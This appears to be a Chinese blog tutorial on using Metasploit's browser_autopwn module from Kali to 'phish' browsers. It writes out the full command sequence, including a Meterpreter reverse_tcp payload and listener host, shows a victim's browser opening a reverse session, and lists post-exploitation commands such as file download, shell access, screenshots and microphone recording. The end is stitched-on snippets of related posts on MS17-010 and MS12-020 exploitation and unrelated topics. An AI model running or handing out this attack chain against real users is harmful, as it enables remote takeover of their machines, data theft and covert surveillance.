kali metasploit 之 autopwn 浏览器钓鱼,java漏洞

本文介绍的autopwn是kali中自带的那个autopwn,

不是相对于bt5被删除的那个autopwn.

1.打开msfconsole, 找出autopwn目录及使用

msf > search autopwn

Matching Modules
================

   Name                              Disclosure Date  Rank    Description
   ----                              ---------------  ----    -----------
   auxiliary/server/browser_autopwn                   normal  HTTP Client Automatic Exploiter

msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > 

2.配置 show options 查看

msf auxiliary(browser_autopwn) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf auxiliary(browser_autopwn) > set LHOST 192.168.154.133
LHOST => 192.168.154.133
msf auxiliary(browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.154.133 yes The IP address to use for reverse-connect payloads
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)

Auxiliary action:

Name Description
---- -----------
WebServer Start a bunch of modules and direct clients to appropriate exploits

msf auxiliary(browser_autopwn) >

3.开始钓鱼

msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed

[*] Setup
[*] Obfuscating initial javascript 2015-03-29 13:30:57 +0800
msf auxiliary(browser_autopwn) > [*] Done in 1.298861072 seconds

[*] Starting exploit modules on host 192.168.154.133...
[*] ---

[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/cqTfdfXcWFC
[*] Local IP: http://192.168.154.133:8080/cqTfdfXcWFC
[*] Server started.

4.等待对方浏览器访问

http://192.168.154.133:8080/fMOGHtWS
[*] Sending stage (30355 bytes) to 192.168.154.136
[*] Meterpreter session 1 opened (192.168.154.133:7777 -> 192.168.154.136:1083) at 2015-03-29 13:36:19 +0800
[*] Session ID 1 (192.168.154.133:7777 -> 192.168.154.136:1083) processing InitialAutoRunScript ‘migrate -f‘

5.开始一个会话

msf auxiliary(browser_autopwn) > sessions -l

Active sessions
===============

  Id  Type                   Information              Connection
  --  ----                   -----------              ----------
  1   meterpreter java/java  admin @ admin-ca9ac4217  192.168.154.133:7777 -> 192.168.154.136:1083 (192.168.154.136)

msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > 

6.会话进行

meterpreter > getuid
Server username: admin
meterpreter > sysinfo
Computer    : admin-ca9ac4217
OS          : Windows XP 5.1 (x86)
Meterpreter : java/java
meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for ‘load‘
    write                     Writes data to a channel

Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory

Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getuid        Get the user that the server is running as
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

    Command       Description
    -------       -----------
    screenshot    Grab a screenshot of the interactive desktop

Stdapi: Webcam Commands
=======================

    Command       Description
    -------       -----------
    record_mic    Record audio from the default microphone for X seconds

meterpreter > 
时间: 2024-08-06 04:41:00

kali metasploit 之 autopwn 浏览器钓鱼,java漏洞的相关文章

MS17-010漏洞复现(kali metasploit)

1.终端进入msf(在终端输入msfconsole),使用search命令查找漏洞模块: 2.根据靶机选择漏洞模块(此处靶机为win7 sp1),使用use+漏洞模块(msf5可以直接使用编号代替模块名称),然后使用show options查看需要的参数. 使用show options查看模块所需参数: 3.通过set [参数名] [参数值]设置参数(配置需要的参数(set rhost 192.168.43.222),run或exploit运行): 4.靶机的cmd: 预防:在微软官网根据漏洞编

ms12-020漏洞复现(kali metasploit)

1.进入kali终端,输入命令msfconsole,使用search命令搜索ms12-020模块.(tip:靶机win7) 2.使用use + [模块名或模块前的序号]选择对应的模块后使用show options查看所需参数 3.根据所需参数使用set命令配置对应参数(这里是配置靶机的地址),然后使用run或exploit运行 4.结果(目标蓝屏重启) 原文地址:https://www.cnblogs.com/walkwaters/p/12244620.html

kali metasploit 数据库配置

kali 网络服务策略使得其没有自动启动的网络服务,包括数据库服务, 而metasploit需要数据库服务的支持,所以开启数据库服务的自动启动 msf > db_status [*] postgresql selected, no connection 简单开启服务: service postgresql start service metasploit start msfconsole db_rebuild_cache 开机开启服务: update-rc.d postgresql enable

Kali Linux安装Tor浏览器

简介: Tor是自由软件,也是一种开放网络,可以帮助你防御流量分析.流量分析是一种网络监视行为,会危及个人自由和隐私.机密性的商业活动和关系以及国家安全.该指南为你详细介绍了在Kali Linux中安装Tor的步骤.Tor保护你的方法是,通过由全球广大志愿者运营的一个分布式中转网络,传递你的通信内容:它可以防止有人监视你的互联网连接.进而了解你访问哪些网站,它还可以防止你访问的网站了解你的实际位址. 更多关于Tor的介绍可以访问下官方:https://www.torproject.org/abo

浏览器运行java插件报错:Algorithm constraints check failed: MD5withRSA

今天使用kvm管理机房机器的时候发现一只连不上,报以下错误: sun.security.validator.ValidatorException: PKIX path validation failed: java.security.cert.CertPathValidatorException: Algorithm constraints check failed: MD5withRSA 我确认我已经把域名添加到例外了,但是还是不行.之前是可以的,同事现在也可以,可能是最近我更新过. goog

mac osx 下 浏览器 开启 java

工作环境mac osx 浏览器 chrome:63.0.3239.132 (Official Build) (64-bit)firefox: 57.0.4 (64 位)safari:Version 11.0.1 (13604.3.5) 堡垒机的部分设置,需在单独的web后台,该后台依赖java,和之前 超微 Supermicro 的 web 管理类似,当时的chrome,还支持java,但是现在chrome版本已经不支持java了 java 检测 https://java.com/zh_CN/d

kali 安装 360国产浏览器

1. 下载360安全浏览器国产版本的 amd64 deb的包 https://browser.360.cn/se/linux/index.html 下载到的文件为: browser360-cn-stable_10.0.2013.0-1_amd64.deb 2. 直接安装会报错 [email protected]:~/下载# dpkg -i browser360-cn-stable_10.0.2013.0-1_amd64.deb (正在读取数据库 ... 系统当前共安装有 352974 个文件和目

Kali Metasploit的用法

Step1:启动postsql数据库 [email protected]:~# service postgresql start Step2:初始化msf数据库 [email protected]:~# msfdb init [i] Database already started[+] Creating database user 'msf'[+] Creating databases 'msf'[+] Creating databases 'msf_test'[+] Creating con

图片浏览器用java实现

该程序实现了图片的缩放以及浏览 package graphics; /** * 图片的缩放功能实现: *为什么图片不能无限放大,因为Thread的run方法不断在调整. *必须选择jpg或png的图片 */ import java.applet.*; import java.awt.Container; import java.awt.Graphics; import java.awt.Graphics2D; import java.awt.Image; import java.awt.Mous